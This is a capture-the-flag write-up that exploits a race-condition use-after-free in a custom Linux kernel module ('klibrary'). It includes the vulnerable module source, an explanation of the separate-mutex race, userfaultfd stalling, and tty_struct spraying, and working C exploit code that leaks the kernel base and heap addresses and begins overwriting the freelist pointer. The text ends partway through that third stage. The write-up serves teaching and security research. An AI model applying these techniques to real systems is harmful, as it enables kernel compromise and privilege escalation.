Exploiting a Linux kernel use-after-free through a race condition.

Description

Store your books safely inside the kernel!

nc klibrary.2021.3k.ctf.to 9994

Setup

You can find the files and the readme here https://github.com/meowmeowxw/kernel-exploits/tree/main/ctf/3k-2021-klibrary

This is a linux kernel pwn challenge. We have:

  1. bzImage -> This is the linux kernel image
  2. initramfs.cpio -> This is the compressed file system
  3. src/library.c -> This is the source code of the custom kernel module
  4. start.sh -> This is the qemu script to run the kernel image

To extract the filesystem use:

mkdir initramfs
cd initramfs
cpio -i < ../initramfs.cpio

Inside we can find the init file and the custom kernel module library.ko.

To compress the filesystem with cpio:

cd ./initramfs
find . | cpio -o -H newc > ../initramfs1.cpio
cd ../

To start the os as root you need to edit initramfs/init:

setsid cttyhack setuidgid 0 sh
# setsid cttyhack setuidgid 1000 sh

I modified the start.sh to compile my exploit, compress the filesystem, disable kaslr and start qemu in debug mode:

#!/bin/sh
# Local debugging launcher: rebuild the exploit, repack the initramfs and
# boot the challenge kernel under QEMU.

# Build the exploit as a static, non-PIE binary directly into the unpacked
# filesystem so it is available inside the guest.
gcc -g -static ./exploit.c -o ./initramfs/exploit -lpthread -no-pie

# Repack the filesystem (newc format) into a separate archive.
cd ./initramfs
find . | cpio -o -H newc > ../initramfs1.cpio
cd ../

# Boot with SMEP/SMAP and pti=on; "nokaslr" is added to the kernel command
# line for debugging, and -s starts QEMU in debug mode.
exec qemu-system-x86_64 \
    -m 128M \
    -nographic \
    -kernel "./bzImage" \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on nokaslr" \
    -no-reboot \
    -cpu qemu64,+smep,+smap \
    -monitor /dev/null \
    -initrd "./initramfs1.cpio" \
    -smp 2 \
    -smp cores=2 \
    -smp threads=1 \
    -s

The active kernel protections are:

  1. KASLR -> We need a leak
  2. SMEP -> You can’t execute shellcode in user-space when the cpu is in kernel mode/ring 0
  3. SMAP -> You can’t access page in user-space when the cpu is in kernel mode (it’s harder to rop)
  4. KPTI -> Separate kernel-space from user-space page tables

You can extract the bzImage with https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux. After that I use https://github.com/marin-m/vmlinux-to-elf to export the symbols inside the kernel’s elf image to use during debugging.

Analysis

library.c:

#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/device.h>

#define DEVICE_NAME "library"
#define CLASS_NAME "library"
#define BOOK_DESCRIPTION_SIZE 0x300

#define CMD_ADD			0x3000
#define CMD_REMOVE		0x3001
#define CMD_REMOVE_ALL	0x3002
#define CMD_ADD_DESC	0x3003
#define CMD_GET_DESC 	0x3004

static DEFINE_MUTEX(ioctl_lock);
static DEFINE_MUTEX(remove_all_lock);

MODULE_AUTHOR("MaherAzzouzi");
MODULE_DESCRIPTION("A library implemented inside the kernel.");
MODULE_LICENSE("GPL");

static int major;
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg);
static int library_open(struct inode* inode, struct file *filp); 
static int library_release(struct inode* inode, struct file *filp); 

/* File operations of the character device: open, release and ioctl only. */
static struct file_operations library_fops = {
	.owner = 			THIS_MODULE,
	.unlocked_ioctl = 	library_ioctl,
	.open = 			library_open,
	.release = 			library_release
};

static struct class* library_class = NULL;
static struct device* library_device = NULL;

/*
 * One book: a node of the doubly linked list whose head is the global `root`.
 * The description buffer (BOOK_DESCRIPTION_SIZE bytes) comes first, followed
 * by the user-chosen index and the list links.
 */
struct Book {
	char book_description[BOOK_DESCRIPTION_SIZE];
	unsigned long index;
	struct Book* next;
	struct Book* prev;
} *root;

/*
 * ioctl argument, copied in from user space by library_ioctl().
 * `index` selects a book; `userland_pointer` is the user buffer used as the
 * source (CMD_ADD_DESC) or destination (CMD_GET_DESC) of the description.
 */
struct Request {
	unsigned long index;
	char __user * userland_pointer;
};

unsigned long counter = 1;

static int add_book(unsigned long index);
static int remove_book(unsigned long index);
static noinline int remove_all(void);
static int add_description_to_book(struct Request request);
static int get_book_description(struct Request request);

/* open() handler: logs a message and always succeeds. */
static int library_open(struct inode* inode, struct file *filp) {
	
	printk(KERN_INFO "[library] : manage your books safely here!\n");
	return 0;
}


/*
 * release() handler: logs a message and frees every book in the list.
 * NOTE(review): remove_all() is called here without holding either mutex.
 */
static int library_release(struct inode* inode, struct file *filp) {
	printk(KERN_INFO "[library] : vulnerable device closed! try harder.\n");
	remove_all();
	return 0;
}

/*
 * ioctl dispatcher.
 *
 * Copies a struct Request from user space, then runs the requested command.
 * Returns -1 if the request cannot be copied and 0 otherwise; the return
 * values of the individual commands are discarded.
 *
 * NOTE(review): CMD_REMOVE_ALL is serialized by remove_all_lock while every
 * other command is serialized by ioctl_lock. The two mutexes are unrelated,
 * so remove_all() can free the list while another command is still using a
 * book.
 */
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg) {
	struct Request request;
	
	/* The request is copied for every command, including CMD_REMOVE_ALL. */
	if(copy_from_user((void*)&request, (void*)arg, sizeof(struct Request))) {
		return -1;
	}
		
	if(cmd == CMD_REMOVE_ALL) {
		/* Only excludes other CMD_REMOVE_ALL callers. */
		mutex_lock(&remove_all_lock);
		remove_all();
		mutex_unlock(&remove_all_lock);	
	} else {
		/* Excludes the other four commands from each other only. */
		mutex_lock(&ioctl_lock);

		switch(cmd) {
				case CMD_ADD:
						add_book(request.index);
						break;
				case CMD_REMOVE:
						remove_book(request.index);
						break;
				case CMD_ADD_DESC:
						add_description_to_book(request);
						break;
				case CMD_GET_DESC:
						get_book_description(request);
						break;
		}

		mutex_unlock(&ioctl_lock);
	}
	return 0;

}

/*
 * Allocate a zeroed book with the given index and append it to the tail of
 * the list. Returns 0 on success, -1 if the limit is reached or the
 * allocation fails. Duplicate indexes are not rejected.
 *
 * NOTE(review): `counter` starts at 1 and the check is `counter >= 10`, so at
 * most 9 books can exist even though the message says 10.
 */
static int add_book(unsigned long index) {
	
	if(counter >= 10) {
		printk(KERN_INFO "[library] can only hold 10 books here\n");
		return -1;
	}

	struct Book *b, *p;
	b = (struct Book*)kzalloc(sizeof(struct Book), GFP_KERNEL);
	
	if(b == NULL) {
		printk(KERN_INFO "[library] : allocation failed! \n");
		return -1;
	}

	b->index = index;
	if(root == NULL) {
		/* First book becomes the list head. */
		root = b;
		root->prev = NULL;
		root->next = NULL;
	} else {
		/* Walk to the current tail and link the new book after it. */
		p = root;
		while(p->next != NULL)
			p = p->next;
		p->next = b;
		b->prev = p;
		b->next = NULL;
	}

	counter++;

	return 0;
}

/*
 * Unlink and free the first book whose index matches.
 * Returns -1 when the list is empty, 0 otherwise.
 *
 * NOTE(review): several paths look unsafe as written:
 *  - when no book matches, the "not found" branch only logs and execution
 *    continues to dereference p, which is NULL at that point;
 *  - when the matching book is the tail, `next` is NULL and `next->prev`
 *    is dereferenced;
 *  - when the head is removed, the new head's `prev` is left pointing at the
 *    freed book.
 */
static int remove_book(unsigned long index) {
	struct Book *p, *prev, *next;
	if(root == NULL) {
		printk(KERN_INFO "[library] : no books in the library yet.");
		return -1;
	} 
	else if (root->index == index) {
		/* Removing the head: advance root, then free the old head. */
		p = root;
		root = root->next;
		kfree(p);
	}
	else {
		/* Linear search for the matching index. */
		p = root;
		while(p != NULL && p->index != index)
			p = p->next;
		
		if(p == NULL) {
			printk(KERN_INFO "[library] : can't remove %ld reason : not found\n", index);
		}

		/* Unlink p from its neighbours. */
		prev = p->prev;
		next = p->next;
		prev->next = next;
		next->prev = prev;
		
		kfree(p);
	}

	counter--;

	return 0;
}

/*
 * Free every book in the list, then reset `root` and `counter`.
 * Always returns 0.
 *
 * `root` is cleared only after all nodes have been freed, so during the walk
 * the list head still refers to freed memory. The function takes no lock
 * itself.
 */
static noinline int remove_all(void) {
	struct Book *b, *p;
	b = root;
	
	while(b != NULL) {
		/* Save the successor before the node is freed. */
		p = b->next;
		kfree(b);
		b = p;
	}
	
	root = NULL;
	counter = 1;
	return 0;
}

/*
 * Copy BOOK_DESCRIPTION_SIZE bytes from request.userland_pointer into the
 * description of the first book whose index equals request.index.
 * Returns -1 if the list is empty, the index is not found or the copy fails.
 *
 * NOTE(review): the success path falls off the end of a non-void function
 * without a return statement.
 */
static int add_description_to_book(struct Request request) {
	struct Book* book = root;

	if(book == NULL){
		printk(KERN_INFO "[library] : no books in the library yet.\n");
		return -1;
	}
	

	/* Empty-bodied loop: stops at the matching book or at the end of the list. */
	for(; book != NULL && book->index != request.index; book = book->next);

	if(book == NULL) {
		printk(KERN_INFO "[library] : the given index wasn't found\n");
		return -1;
	}

	/* `book` was looked up above; it is dereferenced again during this copy. */
	if(copy_from_user((void*)book->book_description,
					  (void*)(request.userland_pointer),
					  BOOK_DESCRIPTION_SIZE)) {
		printk(KERN_INFO "[library] : copy_from_user failed for some reason.\n");
		return -1;
	}
}

/*
 * Copy the BOOK_DESCRIPTION_SIZE-byte description of the first book whose
 * index equals request.index out to request.userland_pointer.
 * Returns -1 if the list is empty, the index is not found or the copy fails.
 *
 * NOTE(review): the success path falls off the end of a non-void function
 * without a return statement.
 */
static int get_book_description(struct Request request) {
	struct Book* book;
	book = root;

	if(book == NULL) {
		printk("[library] : no books yet, can not read the description.\n");
		return -1;
	}

	/* Linear search for the matching index. */
	while(book != NULL && book->index != request.index)
		book = book->next;

	if(book == NULL) {
		printk(KERN_INFO "[library] : no book with the index you provided\n");
		return -1;
	}

	/* `book` was looked up above; it is read again during this copy. */
	if(copy_to_user((void*)request.userland_pointer,
					(void*)book->book_description,
					BOOK_DESCRIPTION_SIZE)) {
		printk("[library] : copy_to_user failed!\n");
		return -1;
	}
}

/*
 * Module init: register the character device with a dynamically assigned
 * major number, create the device class and device node, and reset the list.
 * Each failure path undoes the steps already completed and returns -1.
 */
static int __init init_library(void) {
	/* Major 0 requests a dynamically assigned major number. */
	major = register_chrdev(0, DEVICE_NAME, &library_fops);

	if(major < 0) {
		return -1;
	}

	library_class = class_create(THIS_MODULE, CLASS_NAME);
	if(IS_ERR(library_class)) {
		unregister_chrdev(major, DEVICE_NAME);
		return -1;
	}

	library_device = device_create(library_class, 
					0, 
					MKDEV(major, 0),
				   	0, 
					DEVICE_NAME);

	if(IS_ERR(library_device)) {
		class_destroy(library_class);
		unregister_chrdev(major, DEVICE_NAME);
		return -1;
	}

	root = NULL;
	/* Both mutexes are also statically defined with DEFINE_MUTEX above. */
	mutex_init(&ioctl_lock);
	mutex_init(&remove_all_lock);
	printk(KERN_INFO "[library] : started!\n");
	return 0;
}

/*
 * Module exit: tear down the device node, class and character device, then
 * destroy both mutexes.
 *
 * NOTE(review): class_unregister() followed by class_destroy() on the same
 * class looks redundant — confirm against the driver-core API.
 */
static void __exit exit_library(void) {
	
	device_destroy(library_class, MKDEV(major, 0));
	class_unregister(library_class);
	class_destroy(library_class);
	unregister_chrdev(major, DEVICE_NAME);

	mutex_destroy(&ioctl_lock);
	mutex_destroy(&remove_all_lock);
	printk(KERN_INFO "[library] : finished!\n");
}

module_init(init_library);
module_exit(exit_library);

To communicate with the kernel module we need to use ioctl. The module keeps a doubly linked list whose head is called root:

struct Book {
	char book_description[BOOK_DESCRIPTION_SIZE];
	unsigned long index;
	struct Book* next;
	struct Book* prev;
} *root;

We can interact with the module with 5 commands:

  1. CMD_ADD(index) -> add book to the list and set the specified index
  2. CMD_REMOVE(index) -> remove book from the list
  3. CMD_ADD_DESC(index, buffer) -> copy userspace buffer inside book_description
  4. CMD_GET_DESC(index, buffer) -> copy to userspace buffer the content of book_description
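  5. CMD_REMOVE_ALL() -> kfree all the books

Although the module's log message says 10, the list can hold at most 9 books: counter starts at 1 and add_book refuses to add a book once counter >= 10.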

Vulnerability

if(cmd == CMD_REMOVE_ALL) {
    mutex_lock(&remove_all_lock);
    remove_all();
    mutex_unlock(&remove_all_lock);	
} else {
    mutex_lock(&ioctl_lock);

    switch(cmd) {
            case CMD_ADD:
                    add_book(request.index);
                    break;
            case CMD_REMOVE:
                    remove_book(request.index);
                    break;
            case CMD_ADD_DESC:
                    add_description_to_book(request);
                    break;
            case CMD_GET_DESC:
                    get_book_description(request);
                    break;
    }

    mutex_unlock(&ioctl_lock);
}

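The vulnerability is easy to spot if you’re familiar with this kind of challenge. The module uses two separate mutexes: CMD_REMOVE_ALL takes remove_all_lock, while every other command takes ioctl_lock. remove_all can therefore run concurrently with any other command, and we can trigger a race condition: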

  1. one thread adds a description while another one kfrees the list -> Use-After-Free (write)
  2. one thread gets a description while another one kfrees the list -> Use-After-Free (read)

SLUB Intro

SLUB is the default allocator of the linux kernel, of course it’s not easy to understand the inner workings but there are some nice introductions on the internet:

  1. https://github.com/PaoloMonti42/salt/blob/master/docs/0x00_SLUB_refresher.md
  2. https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html
  3. https://hammertux.github.io/slab-allocator
  4. Read the source code 😎

To keep things simple: there are separate freelists of free objects for the different sizes, plus dedicated lists that contain only one specific kind of object (e.g. the task_struct of every process). You can list them with: cat /proc/slabinfo. Each freelist is a simple linked list in which the next pointer points to the next free object. The SLUB implementation has two protections that, luckily for us, weren’t enabled in this challenge (in reality, only one of them would have been a bit tedious):

  1. CONFIG_SLAB_FREELIST_HARDENED -> obfuscates the next pointer by XORing it with a random value and with the byte-swapped address of the pointer itself (an endianness swap, similar to the glibc 2.32 pointer protection)
  2. CONFIG_SLAB_FREELIST_RANDOM -> randomize the order of the freelist, by default the freed objects available are “ordered” from the lowest to highest address

Since our book struct occupies 0x318=792 bytes the kernel will get a freed object from a kmalloc-1024 list.

Race condition

Spawning two threads that try to trigger the race condition is not optimal: the probability of success is low. Luckily for us, userfaultfd exists; it can be used to register a user-space routine that handles page faults:

https://blog.lizzie.io/using-userfaultfd.html

With this technique we can arbitrarily stop kernel code execution when the kernel tries to execute copy_from_user(dest, uf_page, ...) or copy_to_user(uf_page, src, ...) where uf_page is a mmaped address in user space registered with userfaultfd by us.

So we can effectively stop during add_description_to_book and get_book_description to execute remove_all and trigger the UAF.

Writeup

1st stage

The first thing we have to do is to leak addresses to defeat KASLR. In linux kernel heap exploitation there are various techniques, the most used is to use some syscall to tell the kernel to allocate indirectly some structs, if we have a UAF we can then read/write to this struct to get an arb read/write or rip control.

  1. I free a book in address 0xaa00
  2. syscall(something) -> trigger kmalloc -> return 0xaa00

For a list of useful structs:

  1. https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628
  2. www.personal.psu.edu/yxc431/publications/SLAKE.pdf

For kmalloc-1024 the most used structure is tty_struct that we can use to achieve arbitrary read/write and RIP control. To allocate the structure we just need to execute ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);

The strategy is to:

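| Thread 1                                                 | Thread 2          |
|----------------------------------------------------------|-------------------|
| allocate a book 0                                        | idle              |
| register ufd to address XYZ                              | idle              |
| get_book_description(dest=XYZ) –> STOP execution here    | page fault        |
| idle                                                     | remove_all        |
| idle                                                     | open("/dev/ptmx") |
| idle                                                     | return            |
| finish copy_to_user with leaked tty_struct               | ended             |
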
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <inttypes.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/resource.h>
#include <pthread.h>
#include <sys/mman.h>
#include <poll.h>
#include <time.h>
#include <unistd.h>

#define DEVICE_NAME "/dev/library"

#define BOOK_DESCRIPTION_SIZE 0x300

#define CMD_ADD			0x3000
#define CMD_REMOVE		0x3001
#define CMD_REMOVE_ALL	0x3002
#define CMD_ADD_DESC	0x3003
#define CMD_GET_DESC 	0x3004

#define PAGESIZE 0x1000

int ioctl_add(uint64_t id);
int ioctl_remove(uint64_t id);
int ioctl_add_desc(uint64_t id, uint8_t *buffer);
int ioctl_get_desc(uint64_t id, uint8_t *buffer);
int _ioctl_get_desc(uint64_t id, uint8_t *buffer);
int ioctl_remove_all();
void leak_heap();
void write_next_ptr();
void *race_userfault(void (*func)());
int userfaultfd(int flags);
int register_ufd(uint64_t page);
void print_leak(uint64_t *ptr, int size);
void get_rax();

// User-space mirror of the module's `struct Request` (index + user pointer),
// passed as the ioctl argument.
typedef struct {
    uint64_t index;
    uint8_t *ptr;
} request_t;

// User-space mirror of the three fields that follow book_description in the
// module's `struct Book` (index, next, prev).
typedef struct {
    uint64_t index;
    void *next;
    void *prev;
} book_details;

uint64_t kbase = 0x0L,
         heap_ptr = 0x0L;

int fd, ufd, ret, ptmx;
uint64_t uf_page, rax = 0, leak[BOOK_DESCRIPTION_SIZE];
const char cat[] = {0xf0, 0x9f, 0x90, 0x88, '\0'};
const char shark[] = {0xF0, 0x9F, 0xA6, 0x88, '\0'};
const char dice[] = {0xF0, 0x9F, 0x8E, 0xB2, '\0'};
const char alien[] = {0xF0, 0x9F, 0x91, 0xBE, '\0'};
const char ghost[] = {0xF0, 0x9F, 0x91, 0xBB, '\0'};

int main(int argc, char **argv) {
    uint8_t *buf = calloc(BOOK_DESCRIPTION_SIZE, 1);
    pthread_t th;

    fd = open(DEVICE_NAME, O_RDONLY);
    printf("[%s] fd: %d\n", alien, fd);

    ioctl_add(0);

    // 1st stage: LEAK KBASE AND KHEAP
    ufd = register_ufd(0xaaa000);
    printf("[%s] registered ufd: %d\t @ 0x%lx\n", shark, ufd, uf_page);
    pthread_create(&th, NULL, (void *)race_userfault, leak_heap);
    _ioctl_get_desc(0, (uint8_t *)0xaaa000);

    kbase = leak[66] - 0x14fc00;
    heap_ptr = leak[8] - 0x38;

    printf("\n");
    printf("[%s] kbase:             0x%016lx\n", ghost, kbase);

    close(ptmx);
    return 0;
}

int ioctl_add(uint64_t id) {
    request_t arg = {
        .index = id,
        .ptr = NULL
    };
    printf("[*] ioctl_add[%ld]\n", id);
    ret = ioctl(fd, CMD_ADD, &arg);
    if (ret != 0) {
        printf("[!] ioctl_add   ret: %d\t id: %ld\n", ret, id);
    }
    return 0;
}

// Issue CMD_REMOVE for book `id`. The ioctl result is stored in the global
// `ret` and reported when non-zero; the function itself always returns 0.
int ioctl_remove(uint64_t id) {
    request_t arg = {
        .index = id,
        .ptr = NULL
    };
    printf("[*] ioctl_remove[%ld]\n", id);
    // Pass the full request: the module copies sizeof(struct Request) bytes,
    // so handing it the address of the 8-byte `id` makes it read past it.
    ret = ioctl(fd, CMD_REMOVE, &arg);
    if (ret != 0) {
        printf("[!] ioctl_remove   ret: %d\t id: %ld\n", ret, id);
    }
    return 0;
}

int ioctl_add_desc(uint64_t id, uint8_t *buffer) {
    request_t arg = {
        .index = id,
        .ptr = buffer
    };
    printf("[*] ioctl_add_desc[%ld]\n", id);
    ret = ioctl(fd, CMD_ADD_DESC, &arg);
    if (ret != 0) {
        printf("[!] ioctl_add_desc   ret: %d\t id: %ld\n", ret, id);
    }
    return 0;
}

// Zero `buffer` first, then fetch the description of book `id` into it.
// Must not be used with a userfaultfd page: the memset would touch the page
// from user space.
int ioctl_get_desc(uint64_t id, uint8_t *buffer) {
    int status;

    memset(buffer, 0, BOOK_DESCRIPTION_SIZE);
    status = _ioctl_get_desc(id, buffer);
    return status;
}

int _ioctl_get_desc(uint64_t id, uint8_t *buffer) {
    request_t arg = {
        .index = id,
        .ptr = buffer
    };
    printf("[*] ioctl_get_desc[%ld]\n", id);
    ret = ioctl(fd, CMD_GET_DESC, &arg);
    if (ret != 0) {
        printf("[!] ioctl_get_desc   ret: %d\t id: %ld\n", ret, id);
    }
    memcpy(leak, buffer, BOOK_DESCRIPTION_SIZE);
    print_leak((uint64_t *)buffer, BOOK_DESCRIPTION_SIZE);
    return 0;
}

int ioctl_remove_all() {
    request_t arg = {
        .index = 0xffffff,
        .ptr = NULL
    };
    printf("[*] ioctl_remove_all\n");
    ret = ioctl(fd, CMD_REMOVE_ALL, &arg);
    if (ret != 0) {
        printf("[!] ioctl_remove_all ret: %d\n", ret);
    }
    return 0;
}

// Hex-dump `size` bytes starting at `ptr` as 64-bit words, four words per
// line, followed by a final newline. Trailing bytes that do not fill a whole
// word are ignored.
void print_leak(uint64_t *ptr, int size) {
    int words = size / 8;

    for (int nth = 1; nth <= words; nth++) {
        printf("0x%016lx\t", ptr[nth - 1]);
        if (nth % 4 == 0)
            printf("\n");
    }
    printf("\n");
}

// Map two anonymous pages at the fixed address `page` and register only the
// first one with a new userfaultfd (missing-page mode). The second page stays
// an ordinary mapping, so user space can prepare data right after the
// monitored page without faulting.
//
// Stores the mapping address in the global `uf_page` and returns the
// userfaultfd descriptor. Exits the process on any failure.
int register_ufd(uint64_t page) {
    int uffd;                   // named so it does not shadow the global device `fd`
    int memsize = 0x1000;       // length of the userfaultfd-monitored range
    struct uffdio_api api = { .api = UFFD_API };

    // MAP_ANONYMOUS ignores the descriptor on Linux, but -1 is the portable
    // value to pass.
    uf_page = (uint64_t)mmap((void *)page, 0x2000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    if ((void *)uf_page == MAP_FAILED) {
        perror("mmap uf_page");
        exit(2);
    }

    if ((uffd = userfaultfd(O_NONBLOCK)) == -1) {
        fprintf(stderr, "++ userfaultfd failed: %m\n");
        exit(-1);
    }

    // API handshake, required before any other userfaultfd ioctl.
    if (ioctl(uffd, UFFDIO_API, &api)) {
        fprintf(stderr, "++ ioctl(fd, UFFDIO_API, ...) failed: %m\n");
        exit(-1);
    }
    if (api.api != UFFD_API) {
        fprintf(stderr, "++ unexepcted UFFD api version.\n");
        exit(-1);
    }

    /* register the first page so that touching it raises a userfaultfd event */
    struct uffdio_register reg = {
        .mode = UFFDIO_REGISTER_MODE_MISSING,
        .range = {
            .start = uf_page,
            .len = memsize
        }
    };

    if (ioctl(uffd, UFFDIO_REGISTER,  &reg) == -1) {
        fprintf(stderr, "++ ioctl(fd, UFFDIO_REGISTER, ...) failed: %m\n");
        exit(-1);
    }

    return uffd;
}

// Fault-handler thread body. Waits on the global `ufd` for a page fault on
// the first page of `uf_page`, runs `func` while the faulting thread is
// still blocked, then resolves the fault with a zero-filled page, closes
// `ufd` and returns NULL. Exits the process on any unexpected event.
void *race_userfault(void (*func)()) {
    // Zero-initialized: this buffer becomes the content of the faulting page,
    // so it must not carry indeterminate stack data.
    char uf_buffer[0x1000] = {0};
    struct pollfd evt = { .fd = ufd, .events = POLLIN };

    while (poll(&evt, 1, -1) > 0) {
        /* unexpected poll events */
        if (evt.revents & POLLERR) {
            perror("poll");
            exit(-1);
        } else if (evt.revents & POLLHUP) {
            perror("pollhup");
            exit(-1);
        }
        struct uffd_msg fault_msg = {0};
        if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg)) {
            perror("read");
            exit(-1);
        }
        char *place = (char *)fault_msg.arg.pagefault.address;
        char *first_page = (char *)uf_page;
        // Pointer arithmetic is done on char * rather than void *.
        if (fault_msg.event != UFFD_EVENT_PAGEFAULT
                || (place != first_page && place != first_page + PAGESIZE)) {
            fprintf(stderr, "unexpected pagefault?.\n");
            exit(-1);
        }
        if (place == first_page) {
            printf("[%s] got page fault at address %p, nice!\n", cat, (void *)place);
            printf("[%s] call whatever I want\n", cat);
            // The faulting thread stays blocked until UFFDIO_COPY below.
            func();
            printf("[%s] done! now releasing ufd to finish exit\n", cat);

            /* release by copying some data to faulting address */
            struct uffdio_copy copy = {
                .dst = (long) place,
                .src = (long) uf_buffer,
                .len = PAGESIZE
            };
            if (ioctl(ufd, UFFDIO_COPY, &copy) < 0) {
                perror("ioctl(UFFDIO_COPY)");
                exit(-1);
            }
            break;
        }
    }
    close(ufd);
    return NULL;
}

// Thin wrapper around the raw userfaultfd system call; returns its result
// narrowed to int.
int userfaultfd(int flags) {
    long rc = syscall(SYS_userfaultfd, flags);

    return (int)rc;
}

// Callback run by the fault handler while the kernel is blocked in
// get_book_description. Order matters: the book list is freed first, then a
// pty is opened and its descriptor stored in the global `ptmx`.
void leak_heap() {
    ioctl_remove_all();
    ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);
}

Output:

[👾] fd: 3
[*] ioctl_add[0]
[🦈] registered ufd: 4   @ 0xaaa000
[*] ioctl_get_desc[0]
[🐈] got page fault at address 0xaaa000, nice!
[🐈] call whatever I want
[*] ioctl_remove_all
[🐈] done! now releasing ufd to finish exit
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0xffff8880070d2038
0xffff8880070d2038      0xffff8880070d2048
0xffff8880070d2048      0xffff88800004e260
0x0000000000000000      0xffff8880070d2068
0xffff8880070d2068      0x0000000000000000
0xffff8880070d2080      0xffff8880070d2080
0x0000000000000000      0xffff8880070d2098
0xffff8880070d2098      0x0000000000000000
0x0000000000000000      0xffff8880070d20b8
0xffff8880070d20b8      0x0000000000000000
0xffff8880070d20d0      0xffff8880070d20d0
0x0000000000000000      0x00000000000000bf
0x010004157f1c0300      0x170f12001a131100
0x0000960000000016      0x0000000000009600
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x00000000306d7470      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000010801      0x0000000000000001
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0xffff8880070d2400
0x0000000000000000      0xffff8880070d21d8
0xffff8880070d21d8      0xffff8880070d21e8
0xffff8880070d21e8      0x0000000fffffffe0
0xffff8880070d2200      0xffff8880070d2200
0xffffffff8114fc00      0xffffc90000091000
0xffff8880001658c0      0xffff88800003eb30
0xffff88800003eb30      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000fffffffe0      0xffff8880070d2258
0xffff8880070d2258      0xffffffff8114ec30
0xffff88800709c600      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000

[👻] kbase:             0xffffffff81000000
[👾] heap_ptr:          0xffff8880070d2000

For some reason I don’t get the first 0x30 bytes of the tty_struct (they read as zero). For example, at +0x18 there should be the pointer to the virtual table used by the tty. To get the offsets of a struct’s fields I use pahole (although the offsets sometimes depend on the compilation flags, etc.). Example:

$ pahole -E tty_struct
struct tty_struct {
        int                        magic;                                                /*     0     4 */
        struct kref {
                /* typedef refcount_t */ struct refcount_struct {
                        /* typedef atomic_t */ struct {
                                int counter;                                             /*     4     4 */
                        } refs; /*     4     4 */
                } refcount; /*     4     4 */
        } kref; /*     4     4 */
        struct device *            dev;                                                  /*     8     8 */
        struct tty_driver *        driver;                                               /*    16     8 */
        const struct tty_operations  * ops;                                              /*    24     8 */
        int                        index;                                                /*    32     4 */

        /* XXX 4 bytes hole, try to pack */

        struct ld_semaphore {
                /* typedef atomic_long_t -> atomic64_t */ struct {
                        /* typedef s64 -> __s64 */ long long int counter;                /*    40     8 */

                        ...

        struct list_head {
                        struct list_head * next;                                         /*    56     8 */
                        /* --- cacheline 1 boundary (64 bytes) --- */
                        struct list_head * prev;                                         /*    64     8 */
                } read_wait; /*    56    16 */
                struct list_head {
                        struct list_head * next;                                         /*    72     8 */
                        struct list_head * prev;                                         /*    80     8 */
...

Anyway, at offsets 56 and 64 there are the next and prev pointers of a list_head (read_wait). Since that list is empty, both pointers point back to the list head itself, i.e. to tty_struct + 0x38. If we subtract 0x38 from either of them we get the address of the tty_struct. At offset 66*8 there is instead a kernel pointer: we just need to subtract a fixed offset from it to get the kernel base (verify with grep startup_64 /proc/kallsyms).

2nd stage

I want to know what is the next available objects, so I redo the UAF in read, but I don’t open("/dev/ptmx")

    // 2nd stage: LEAK NEXT PTR
    // Same read race as stage 1, but the handler only frees the list and does
    // not open /dev/ptmx, so the copy reads the freed object itself.
    ioctl_add(0);

    ufd = register_ufd(0xbbb000);
    printf("registered ufd: %d\t 0x%lx\n", ufd, uf_page);
    pthread_create(&th, NULL, (void *)race_userfault, ioctl_remove_all);
    _ioctl_get_desc(0, (uint8_t *)0xbbb000);
    // The freelist next pointer is found at offset 512 of the freed object.
    next_ptr = leak[512 / 8];

Usually you find the next_ptr in the first 8 bytes of a free object, but this time it’s in the middle of the chunk (offset 1024/2 = 512).

I always get next_ptr = heap_ptr + 1024, so this step can be skipped, but on a real (non-QEMU) system it might make sense.

3rd stage

The best scenario is to be able to read/write inside the tty_struct, so we need to have a stable UAF (not one that can only be used during race condition). To do that I used this approach:

Basically, I wanted book1 to be located at address &book0 + 32.

Why ?

Because in this way after a remove(1); open("/dev/ptmx") with:

  • get_book_description(0) I can read the tty_struct
  • add_description_to_book(0) I can overwrite the tty_struct

The +32 is needed to not overwrite the index, next, prev of book0, otherwise we couldn’t access book0 if we overwrite book0 with book1.

We also need some luck: we have to hope that the tty_struct doesn’t overwrite the index of book0, otherwise we can’t access book0 anymore (spoiler: we are lucky).

    // 3rd stage overwrite next ptr
    // Write race: the handler frees book0 while add_description_to_book is
    // blocked, so the description is written into the freed object.
    ioctl_add(0);
    ufd = register_ufd(0xccc000);
    printf("registered ufd: %d\t 0x%lx\n", ufd, uf_page);
    pthread_create(&th, NULL, (void *)race_userfault, ioctl_remove_all);
    // Source buffer starts at uf_page + 0xf00: its first 0x100 bytes lie in
    // the userfaultfd page, while offset 512 (the freelist next pointer) lies
    // in the second, ordinary page and can be prepared here without faulting.
    ((uint64_t *)(uf_page + 0xf00))[512/8] = heap_ptr + 32;
